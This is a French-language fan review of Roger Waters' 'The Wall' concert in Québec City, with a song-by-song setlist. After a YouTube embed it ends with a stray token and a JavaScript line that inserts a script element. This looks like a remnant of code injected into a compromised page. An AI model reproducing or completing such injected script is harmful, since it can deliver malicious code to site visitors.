C'est à 21h15 très exactement que le spectacle débutait. Un son impeccable, d'une qualité incomparable à un tel point que même avec plus de 75 000 personnes, à l'avant-scène, nous avions de la difficulté à entendre la foule. Dès la première chanson In the Flesh? La pyrotechnie était au rendez-vous! De chaque côté de la scène, des dizaines d'explosifs illuminaient les parois du mur de façons synchronisées avec la musique. À la fin de cette première pièce musicale, un avion qui se perchait au bout d'une grue vient s'enfoncer dans le haut du mur, le public était déjà conquis.

Québec, étais-tu près pour ça? Wow! J'en suis encore abasourdi, j'arrive à peine à vous décrire toute l'émotion que j'ai ressentie. Le spectacle qui se déroulait en deux parties nous a laissé voir toute l’imagination de Roger Waters pour cette œuvre. Pas moins de 3 tours de projection contenant 9 projecteurs chacune servaient à reproduire les images sur les 2 côtés de la scène. Un mur d'une envergure total de 723 pieds laissait voir des panneaux de coroplast décoré par des gens d'ici, dont un bon ami CHUCK, ainsi que l'équipe de TECH M.F, a pu immortaliser leur présence à ce moment unique en son genre. Au moment de jouer Another Brick In The Wall ( Part 2 ) pas moins de 15 enfants ont fait leur apparition pour chanter et confronter le personnage gonflable d'une hauteur de 3 à 4 étages. Pour la chanson The Ballad Of Jean Charles De Menezes, pièce ajoutée en 2011 à son spectacle, Waters a non seulement dédié la chanson à cette personne, mais tout le spectacle à ceux et celle qui sont victime d'erreurs policière et fait du genre.

Mother, que dire? Roger, interprétant seul avec sa guitare acoustique avec des images encore une fois sûres tout le long du mur. À l’entracte, le mur est complètement, PINK le personnage de Waters se sent protégé. Durant 15 minutes on projette des images de gens disparus, plusieurs militaires morts au combat, des personnalités connues, dont Gandhi. Au retour des musiciens c'est devant le mur que tout se passe, un immense cochon gonflable vole au dessus des spectateurs avec le symbole fasciste des marteaux croisés peinturé de messages autant en français quand anglais. Comme à l'habitude durant la pièce Nobody Home, Waters sort du côté gauche du mur sur un fauteuil, encore une fois avec des images toutes au

tour de lui. Puis viens Comfortably Numb, j'aurais cru que le maque de David Gilmour sur scène serait pénible, mais non, le guitariste Dave Kilminster nous en a mis plein les oreilles. In The Flesh, encore une fois magistrale, des lumières, 41 projecteurs pour être plus exacte illuminaient le ciel d'un côté à l'autre de la scène pour former un point central à près d'un kilomètre dans les aires.

Pour terminer cette soirée riche en émotion et en images, c'est sur Outside The Wall, que les 12 musiciens firent leurs adieux au Québecois sans pour autant attendre quelque minute, car une ovation monstre leur fut offerte. J'aurais pu dire que cette soirée a été magistrale, incroyable et d'une qualité à ne savoir comment la décrire, mais pour ce qui est de ma part un seul mot convient, ÉPIC! Rien de moins.

Parions que l'équipe de Waters se souviendront toute leur vie de cette soirée au Québec, et laisserons la place à des groupes tels qu'ACDC, The Rolling Stone, et plusieurs autres groupes pourraient tenter de venir conquérir le cœur des gens de la ville de Québec et plus encore sur un terrain des plus approprié pour se genre d'évènement grandiose.

Voici le lien de l'album photo de Roger Waters « The Wall » Par ICI

Première partie

In the Flesh?

The Thin Ice

Another Brick in the Wall Part 1

The Happiest Days of Our Lives

Another Brick in the Wall Part 2 (avec un choeur de Jeunes Musiciens du Monde)

The Ballad Of Jean Charles de Menezes

Mother

Goodbye Blue Sky

Empty Spaces

What Shall We Do Now?

Young Lust

One of My Turns

Don't Leave Me Now

Another Brick in the Wall Part 3

The Last Few Bricks

Goodbye Cruel World

Deuxième partie

Hey You

Is There Anybody Out There?

Nobody Home

Vera

Bring the Boys Back Home

Comfortably Numb

The Show Must Go On

In the Flesh

Run Like Hell

Waiting for the Worms

Stop

The Trial

Outside the Wall

[youtube id= »uc5ar9T7p80″ width= »620″ height= »360″]

zp8497586rq

document.currentScript.parentNode.insertBefore(s, document.currentScript);